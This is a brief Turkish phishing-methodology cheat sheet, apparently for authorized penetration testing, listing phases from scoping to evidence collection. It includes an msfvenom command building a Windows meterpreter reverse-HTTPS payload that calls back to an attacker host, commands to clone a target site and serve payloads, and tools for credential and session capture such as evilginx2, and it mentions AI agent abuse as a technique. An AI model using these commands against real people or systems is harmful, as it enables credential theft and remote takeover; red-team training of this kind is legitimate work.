Skip to content

Phishing Metodolojisi

metodoloji offensive

Phishing Metodolojisi metodoloji notudur. Keşif → hipotez → PoC → kanıt akışını tutarlı uygula.

  1. Kapsam ve engel listesini kilitle.

  2. Pasif/aktif keşif ile envanter çıkar.

  3. Risk odaklı hipotezleri PoC ile doğrula.

  4. Kanıt ve sonraki pivot notunu paketle.

pretext → altyapı → landing/payload → credential/oturum → dayanak
Terminal window
gophish
Terminal window
evilginx2
Terminal window
wget --mirror --convert-links https://TARGET
Terminal window
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=ATTACKER LPORT=443 -f exe -o stage.exe
Terminal window
python3 -m http.server 8000
homograph IDN, clipboard hijack, Discord invite swap, AI agent abuse
kapsam → recon → threat model → hipotez → exploit → post → rapor
Terminal window
nuclei -l targets.txt -severity
request/response, komut çıktısı, ekran, hash, zaman damgası, etki özeti
Terminal window
mkdir -p evidence/metodoloji && tee evidence/metodoloji/notes.txt
[ ] fingerprint / profil alındı
[ ] primitif veya erişim doğrulandı
[ ] PoC etkiyi gösterdi
[ ] kanıt paketlendi
[ ] sonraki pivot not edildi